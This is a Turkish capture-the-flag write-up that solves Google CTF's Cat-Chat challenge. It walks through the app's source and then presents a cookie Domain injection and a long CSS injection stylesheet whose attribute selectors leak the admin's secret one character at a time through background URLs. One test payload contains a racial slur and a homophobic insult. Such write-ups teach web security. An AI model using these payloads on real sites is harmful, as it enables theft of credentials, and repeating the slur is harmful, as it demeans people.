Cat-Chat - Google CTF

1
2
3
You discover this cat enthusiast chat app, but the annoying thing about it is that you’re always banned when you start talking about dogs. Maybe if you would somehow get to know the admin’s password, you could fix that.

https://cat-chat.web.ctfcompetition.com/

Ön inceleme

  • /name yeni_isim ile isim değiştiriliyor
  • /report dediğimiz zaman Dog talk konuşanları gelip banlıyor
  • kaynak kodu verilmiş

ilkEkran

Bizden istenilen ise admin parolası veya session bilgisi. Kafamızda direk XSS sorusu dedik kendi kendimize.

/report‘u deniyelim

ilkEkran

iv3m kullanıcısından reportlayıp roll kullanıcısından dog yazdık. Ve admin gelip roll kullanıcısını banladı.(ban adlı cookie’yi 1 olarak set etti)

  • Admin geldiğine göre bunu bir köşeye yazalım.

Analiz ve hata keşfi

Kaynak koduna baktığımızda(html source)

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>Cat Chat</title>
<script src="/catchat.js"></script>
<script src="https://www.google.com/recaptcha/api.js?render=6LeB410UAAAAAGkmQanWeqOdR6TACZTVypEEXHcu"></script>
<link rel="stylesheet" type="text/css" href="/style.css">
</head>
<body>
<div id="panel">
<div id="conversation">
<p>Welcome to Cat Chat! This is your brand new room where you can discuss anything related to cats. You have been assigned a random nick name that you can change any time.</p>
<p>Rules:</p>
<p>- You may invite anyone to this chat room. Just share the URL.</p>
<p>- Dog talk is strictly forbidden. If you see anyone talking about dogs, please report the incident, and the admin will take the appropriate steps. This usually means that the admin joins the room, listens to the conversation for a brief period and bans anyone who mentions dogs.</p>
<p>Commands you can use: (just type a message starting with slash to invoke commands)</p>
<p>- `/name YourNewName` - Change your nick name to YourNewName.</p>
<p>- `/report` - Report dog talk to the admin.</p>
<!--
Admin commands:
- `/secret asdfg` - Sets the admin password to be sent to the server with each command for authentication. It's enough to set it once a year, so no need to issue a /secret command every time you open a chat room.
- `/ban UserName` - Bans the user with UserName from the chat (requires the correct admin password to be set).
-->
<p>Btw, the core of the chat engine is open source! You can download the source code <a href="/server.js">here</a>.</p>
<p style="margin-bottom: 5em">Alright, have fun!</p>
</div>
<input id="messagebox" autofocus>
</div>
</body>
</html>

( tüm kodu yapıştırma sebebim belki soruları geri bulamayız )

2 adet admin komutu öğrenmiş olduk

  • /secret xxx komutu flag adlı cookie’yi xxx olarak set ediyor.
  • /ban kullanıcıAdı admin şifresi yani flag doğru ise hedef kişiyi banlıyor.

Server-side kod inceleme

Back-end tarafını bizimle paylaşmıştı server.js

1
2
3
4
5
6
7
const http = require('http');
const express = require('express');
const cookieParser = require('cookie-parser')
const uuidv4 = require('uuid/v4');
const SSEClient = require('sse').Client;
const admin = require('./admin');
const pubsub = require('@google-cloud/pubsub')();

Temal kütüphane importları ve admin.js‘i import ediyor. Malesef admin.js‘e erişimimiz yok

1
2
3
const app = express();
app.set('etag', false);
app.use(cookieParser());

app.set(‘etag’, false) entity-tag kapatılmış. Anlayacağımız web-cache validation yok.

1
app.use(admin.middleware);

flag cookiesi’ni kontrol edip admin mi değil mi diye kontrol ediyor

1
2
3
4
5
6
7
8
app.use(function(req, res, next) {
if (req.cookies.banned) {
res.sendStatus(403);
res.end();
} else {
next();
}
});

Kullanıcı’nın banlı olup olmadığını kontrol ediyor. Eğer banlı ise 403 sayfasına yönlendiriyor.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
app.get('/', (req, res) => res.redirect(`/room/${uuidv4()}/`));
let roomPath = '/room/:room([0-9a-f-]{36})';
app.get(roomPath + '/', function(req, res) {
res.sendFile(__dirname + '/static/index.html', {
headers: {
'Content-Security-Policy': [
'default-src \'self\'',
'style-src \'unsafe-inline\' \'self\'',
'script-src \'self\' https://www.google.com/recaptcha/ https://www.gstatic.com/recaptcha/',
'frame-src \'self\' https://www.google.com/recaptcha/',
].join('; ')
},
});
});

eğer / dizinine gidersek bize benzersiz bir id atayıp /static/index.html‘in içeriğini göstercekmiş. Ayrıca CSP kısıtlamaları ve ayrıcalıkları verilmiş.

1
'style-src \'unsafe-inline\' \'self\''

kısmını unutmamakta fayda var. Yani inline şekilde olan style ayarlarına izin var.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
app.all(roomPath + '/send', async function(req, res) {
let room = req.params.room, {msg, name} = req.query, response = {}, arg;
console.log(`${room} <-- (${name}):`, msg)
if (!(req.headers.referer || '').replace(/^https?:\/\//, '').startsWith(req.headers.host)) {
response = {type: "error", error: 'CSRF protection error'};
} else if (msg[0] != '/') {
broadcast(room, {type: 'msg', name, msg});
} else {
switch (msg.match(/^\/[^ ]*/)[0]) {
case '/name':
if (!(arg = msg.match(/\/name (.+)/))) break;
response = {type: 'rename', name: arg[1]};
broadcast(room, {type: 'name', name: arg[1], old: name});
case '/ban':
if (!(arg = msg.match(/\/ban (.+)/))) break;
if (!req.admin) break;
broadcast(room, {type: 'ban', name: arg[1]});
case '/secret':
if (!(arg = msg.match(/\/secret (.+)/))) break;
res.setHeader('Set-Cookie', 'flag=' + arg[1] + '; Path=/; Max-Age=31536000');
response = {type: 'secret'};
case '/report':
if (!(arg = msg.match(/\/report (.+)/))) break;
var ip = req.headers['x-forwarded-for'];
ip = ip ? ip.split(',')[0] : req.connection.remoteAddress;
response = await admin.report(arg[1], ip, `https://${req.headers.host}/room/${room}/`);
}
}
console.log(`${room} --> (${name}):`, response)
res.json(response);
res.status(200);
res.end();
});

Geldik mesajlar kısmına.

1
2
3
if (!(req.headers.referer || '').replace(/^https?:\/\//, '').startsWith(req.headers.host)) {
response = {type: "error", error: 'CSRF protection error'};
}

Refer based CSRF koruması varmış.

1
2
3
else if (msg[0] != '/') {
broadcast(room, {type: 'msg', name, msg});
}

Eğer mesaj / ile başlamıyorsa yani komut değilse mesaj olarak yolluyor.

Geldik eğer komutsa kısmına

1
2
3
4
case '/name':
if (!(arg = msg.match(/\/name (.+)/))) break;
response = {type: 'rename', name: arg[1]};
broadcast(room, {type: 'name', name: arg[1]old: name});

/name ise isim değiştir

1
2
3
4
case '/ban':
if (!(arg = msg.match(/\/ban (.+)/))) break;
if (!req.admin) break;
broadcast(room, {type: 'ban', name: arg[1]});

/ban xxx ise ve banlamak isteyen kişi admin ise xx i banla

1
2
3
4
case '/secret':
if (!(arg = msg.match(/\/secret (.+)/))) break;
res.setHeader('Set-Cookie', 'flag=' + arg[1] + '; Path=/; Max-Age=31536000');
response = {type: 'secret'};

/secret xxx ise flag cookiesini xxx olarak set et.

1
2
3
4
5
case '/report':
if (!(arg = msg.match(/\/report (.+)/))) break;
var ip = req.headers['x-forwarded-for'];
ip = ip ? ip.split(',')[0] : req.connection.remoteAddress;
response = await admin.report(arg[1], ip, `https://${req.headers.host}/room/${room}/`);

/report ise admin‘i çağır. (x-forwarded-for niye konulmuş bir fikrim yok ama sanırım ki içerideki reverse proxyden dolayı)

Buraya kadar öğrendiklerimiz

  • İsim değiştirebildiğimiz.
  • style-src unsafe-inline‘den dolayı inline şekilde style değişikliği yapabildiğimiz.
  • flag’in /secret komutuna bağlı olduğu

Client-side kod inceleme

Geldik Client-side kod inceleme kısmına cat-chat.js

1
let esc = (str) => str.replace(/</g, '&lt;').replace(/>/g, '&gt;').replace(/"/g, '&quot;').replace(/'/g, '&apos;');

Escape fonksiyonuna göre [‘>’,’<’,’ “ ‘,’ \’ ‘] karakterleri yasaklı. Bu kısımıda not edelim.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
function handle(data) {
({
undefined(data) {},
error(data) { display(`Something went wrong :/ Check the console for error message.`); console.error(data); },
name(data) { display(`${esc(data.old)} is now known as ${esc(data.name)}`); },
rename(data) { localStorage.name = data.name; },
secret(data) { display(`Successfully changed secret to <span data-secret="${esc(cookie('flag'))}">*****</span>`); },
msg(data) {
let you = (data.name == localStorage.name) ? ' (you)' : '';
if (!you && data.msg == 'Hi all') send('Hi');
display(`<span data-name="${esc(data.name)}">${esc(data.name)}${you}</span>: <span>${esc(data.msg)}</span>`);
},
ban(data) {
if (data.name == localStorage.name) {
document.cookie = 'banned=1; Path=/';
sse.close();
display(`You have been banned and from now on won't be able to receive and send messages.`);
} else {
display(`${esc(data.name)} was banned.<style>span[data-name^=${esc(data.name)}] { color: red; }</style>`);
}
},
})[data.type](data);
}

Bizi sadece /name, /report ve /ban ilgilendiriyor demiştik.

1
2
3
4
5
6
7
8
9
ban(data) {
if (data.name == localStorage.name) {
document.cookie = 'banned=1; Path=/';
sse.close();
display(`You have been banned and from now on won't be able to receive and send messages.`);
} else {
display(`${esc(data.name)} was banned.<style>span[data-name^=${esc(data.name)}] { color: red; }</style>`);
}
}

CSP‘yi hatırlayalım. style-src, unsafe-inline olarak ayarlanmış.

1
display(`Successfully changed secret to <span data-secret="${esc(cookie('flag'))}">*****</span>`

/secret ile flag‘i değiştirdiğimiz zaman flag değeri data-secret attribute’una değişen hali yazılıyormuş.

nou

Bunuda köşeye yazalım

1
display(`${esc(data.name)} was banned.<style>span[data-name^=${esc(data.name)}] { color: red; }</style>`);

span[data-name^=${esc(data.name)}] temizinden bir CSS injection

Deneme senaryosu

  • kullanıcı ismini diye değiştirsin nendo ] {background:url(/room/fa5c99a4-1bde-4998-a289-a0f424ef2e0f/send?name=admin&msg=niger%20you%20gay);}
  • diğer kullanıcı report etsin
  • kullanıcı dog yazsın

yrmm

Denememiz başarı oldu

Flag değerini data-secret attribute’una değişen hali yazdığını hatırlayalım.

flag‘i değiştirmeden data-secret değerine yazdırmamız gerekiyor.

server.js‘e tekrar dönüp bakalım

1
2
3
4
case '/secret':
if (!(arg = msg.match(/\/secret (.+)/))) break;
res.setHeader('Set-Cookie', 'flag=' + arg[1] '; Path=/; Max-Age=31536000');
response = {type: 'secret'};

Header set ederken girdi kontrolü yapmıyor. Başka domaine cookie’yi set edebiliriz.

1
/secret yeniSecret; Domain=x

Dediğimizi var sayarsak. olmayan bir domaine set edecek bundan dolayi cookie değişmeyecek.

nou

Şimdi sıra data-secret değerini okumakta.

bknz. CSS ile veri çalmak

her karakteri backroud resmi seklinde mesaj yollamasını sağlayacağız. CSS Selector ile durmadan ilk karakteri kontrol etmemiz gerekiyor

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
/name 4d4] {
background: url(/room/fa5c99a4-1bde-4998-a289-a0f424ef2e0f/send?name=admin&msg=/secret dummy; Domain=d2gn834g5z45m9h14fkk5rbh);
}

span[data-secret^=a] {
background: url(/room/fa5c99a4-1bde-4998-a289-a0f424ef2e0f/send?name=admin&msg=a);
}

span[data-secret^=b] {
background: url(/room/fa5c99a4-1bde-4998-a289-a0f424ef2e0f/send?name=admin&msg=b);
}

span[data-secret^=c] {
background: url(/room/fa5c99a4-1bde-4998-a289-a0f424ef2e0f/send?name=admin&msg=c);
}

span[data-secret^=d] {
background: url(/room/fa5c99a4-1bde-4998-a289-a0f424ef2e0f/send?name=admin&msg=d);
}

span[data-secret^=e] {
background: url(/room/fa5c99a4-1bde-4998-a289-a0f424ef2e0f/send?name=admin&msg=e);
}

span[data-secret^=f] {
background: url(/room/fa5c99a4-1bde-4998-a289-a0f424ef2e0f/send?name=admin&msg=f);
}

span[data-secret^=g] {
background: url(/room/fa5c99a4-1bde-4998-a289-a0f424ef2e0f/send?name=admin&msg=g);
}

span[data-secret^=h] {
background: url(/room/fa5c99a4-1bde-4998-a289-a0f424ef2e0f/send?name=admin&msg=h);
}

span[data-secret^=i] {
background: url(/room/fa5c99a4-1bde-4998-a289-a0f424ef2e0f/send?name=admin&msg=i);
}

span[data-secret^=j] {
background: url(/room/fa5c99a4-1bde-4998-a289-a0f424ef2e0f/send?name=admin&msg=j);
}

span[data-secret^=k] {
background: url(/room/fa5c99a4-1bde-4998-a289-a0f424ef2e0f/send?name=admin&msg=k);
}

span[data-secret^=l] {
background: url(/room/fa5c99a4-1bde-4998-a289-a0f424ef2e0f/send?name=admin&msg=l);
}

span[data-secret^=m] {
background: url(/room/fa5c99a4-1bde-4998-a289-a0f424ef2e0f/send?name=admin&msg=m);
}

span[data-secret^=n] {
background: url(/room/fa5c99a4-1bde-4998-a289-a0f424ef2e0f/send?name=admin&msg=n);
}

span[data-secret^=o] {
background: url(/room/fa5c99a4-1bde-4998-a289-a0f424ef2e0f/send?name=admin&msg=o);
}

span[data-secret^=p] {
background: url(/room/fa5c99a4-1bde-4998-a289-a0f424ef2e0f/send?name=admin&msg=p);
}

span[data-secret^=q] {
background: url(/room/fa5c99a4-1bde-4998-a289-a0f424ef2e0f/send?name=admin&msg=q);
}

span[data-secret^=r] {
background: url(/room/fa5c99a4-1bde-4998-a289-a0f424ef2e0f/send?name=admin&msg=r);
}

span[data-secret^=s] {
background: url(/room/fa5c99a4-1bde-4998-a289-a0f424ef2e0f/send?name=admin&msg=s);
}

span[data-secret^=t] {
background: url(/room/fa5c99a4-1bde-4998-a289-a0f424ef2e0f/send?name=admin&msg=t);
}

span[data-secret^=u] {
background: url(/room/fa5c99a4-1bde-4998-a289-a0f424ef2e0f/send?name=admin&msg=u);
}

span[data-secret^=v] {
background: url(/room/fa5c99a4-1bde-4998-a289-a0f424ef2e0f/send?name=admin&msg=v);
}

span[data-secret^=w] {
background: url(/room/fa5c99a4-1bde-4998-a289-a0f424ef2e0f/send?name=admin&msg=w);
}

span[data-secret^=x] {
background: url(/room/fa5c99a4-1bde-4998-a289-a0f424ef2e0f/send?name=admin&msg=x);
}

span[data-secret^=y] {
background: url(/room/fa5c99a4-1bde-4998-a289-a0f424ef2e0f/send?name=admin&msg=y);
}

span[data-secret^=z] {
background: url(/room/fa5c99a4-1bde-4998-a289-a0f424ef2e0f/send?name=admin&msg=z);
}

span[data-secret^=A] {
background: url(/room/fa5c99a4-1bde-4998-a289-a0f424ef2e0f/send?name=admin&msg=A);
}

span[data-secret^=B] {
background: url(/room/fa5c99a4-1bde-4998-a289-a0f424ef2e0f/send?name=admin&msg=B);
}

span[data-secret^=C] {
background: url(/room/fa5c99a4-1bde-4998-a289-a0f424ef2e0f/send?name=admin&msg=C);
}

span[data-secret^=D] {
background: url(/room/fa5c99a4-1bde-4998-a289-a0f424ef2e0f/send?name=admin&msg=D);
}

span[data-secret^=E] {
background: url(/room/fa5c99a4-1bde-4998-a289-a0f424ef2e0f/send?name=admin&msg=E);
}

span[data-secret^=F] {
background: url(/room/fa5c99a4-1bde-4998-a289-a0f424ef2e0f/send?name=admin&msg=F);
}

span[data-secret^=G] {
background: url(/room/fa5c99a4-1bde-4998-a289-a0f424ef2e0f/send?name=admin&msg=G);
}

span[data-secret^=H] {
background: url(/room/fa5c99a4-1bde-4998-a289-a0f424ef2e0f/send?name=admin&msg=H);
}

span[data-secret^=I] {
background: url(/room/fa5c99a4-1bde-4998-a289-a0f424ef2e0f/send?name=admin&msg=I);
}

span[data-secret^=J] {
background: url(/room/fa5c99a4-1bde-4998-a289-a0f424ef2e0f/send?name=admin&msg=J);
}

span[data-secret^=K] {
background: url(/room/fa5c99a4-1bde-4998-a289-a0f424ef2e0f/send?name=admin&msg=K);
}

span[data-secret^=L] {
background: url(/room/fa5c99a4-1bde-4998-a289-a0f424ef2e0f/send?name=admin&msg=L);
}

span[data-secret^=M] {
background: url(/room/fa5c99a4-1bde-4998-a289-a0f424ef2e0f/send?name=admin&msg=M);
}

span[data-secret^=N] {
background: url(/room/fa5c99a4-1bde-4998-a289-a0f424ef2e0f/send?name=admin&msg=N);
}

span[data-secret^=O] {
background: url(/room/fa5c99a4-1bde-4998-a289-a0f424ef2e0f/send?name=admin&msg=O);
}

span[data-secret^=P] {
background: url(/room/fa5c99a4-1bde-4998-a289-a0f424ef2e0f/send?name=admin&msg=P);
}

span[data-secret^=Q] {
background: url(/room/fa5c99a4-1bde-4998-a289-a0f424ef2e0f/send?name=admin&msg=Q);
}

span[data-secret^=R] {
background: url(/room/fa5c99a4-1bde-4998-a289-a0f424ef2e0f/send?name=admin&msg=R);
}

span[data-secret^=S] {
background: url(/room/fa5c99a4-1bde-4998-a289-a0f424ef2e0f/send?name=admin&msg=S);
}

span[data-secret^=T] {
background: url(/room/fa5c99a4-1bde-4998-a289-a0f424ef2e0f/send?name=admin&msg=T);
}

span[data-secret^=U] {
background: url(/room/fa5c99a4-1bde-4998-a289-a0f424ef2e0f/send?name=admin&msg=U);
}

span[data-secret^=V] {
background: url(/room/fa5c99a4-1bde-4998-a289-a0f424ef2e0f/send?name=admin&msg=V);
}

span[data-secret^=W] {
background: url(/room/fa5c99a4-1bde-4998-a289-a0f424ef2e0f/send?name=admin&msg=W);
}

span[data-secret^=X] {
background: url(/room/fa5c99a4-1bde-4998-a289-a0f424ef2e0f/send?name=admin&msg=X);
}

span[data-secret^=Y] {
background: url(/room/fa5c99a4-1bde-4998-a289-a0f424ef2e0f/send?name=admin&msg=Y);
}

span[data-secret^=Z] {
background: url(/room/fa5c99a4-1bde-4998-a289-a0f424ef2e0f/send?name=admin&msg=Z);
}

span[data-secret^=0] {
background: url(/room/fa5c99a4-1bde-4998-a289-a0f424ef2e0f/send?name=admin&msg=0);
}

span[data-secret^=1] {
background: url(/room/fa5c99a4-1bde-4998-a289-a0f424ef2e0f/send?name=admin&msg=1);
}

span[data-secret^=2] {
background: url(/room/fa5c99a4-1bde-4998-a289-a0f424ef2e0f/send?name=admin&msg=2);
}

span[data-secret^=3] {
background: url(/room/fa5c99a4-1bde-4998-a289-a0f424ef2e0f/send?name=admin&msg=3);
}

span[data-secret^=4] {
background: url(/room/fa5c99a4-1bde-4998-a289-a0f424ef2e0f/send?name=admin&msg=4);
}

span[data-secret^=5] {
background: url(/room/fa5c99a4-1bde-4998-a289-a0f424ef2e0f/send?name=admin&msg=5);
}

span[data-secret^=6] {
background: url(/room/fa5c99a4-1bde-4998-a289-a0f424ef2e0f/send?name=admin&msg=6);
}

span[data-secret^=7] {
background: url(/room/fa5c99a4-1bde-4998-a289-a0f424ef2e0f/send?name=admin&msg=7);
}

span[data-secret^=8] {
background: url(/room/fa5c99a4-1bde-4998-a289-a0f424ef2e0f/send?name=admin&msg=8);
}

span[data-secret^=9] {
background: url(/room/fa5c99a4-1bde-4998-a289-a0f424ef2e0f/send?name=admin&msg=9);
}

span[data-secret^=_] {
background: url(/room/fa5c99a4-1bde-4998-a289-a0f424ef2e0f/send?name=admin&msg=_);
}

Dedik ve flag’in ilk harfini aldık

yrmm

Tek tek yapmak yerine azıcık otomize etmek gerek. Yarışma esnasında yazdığımız bettiği bulamıyorum.

yrmm

Ve flag CTF{L0LC47S_43V3R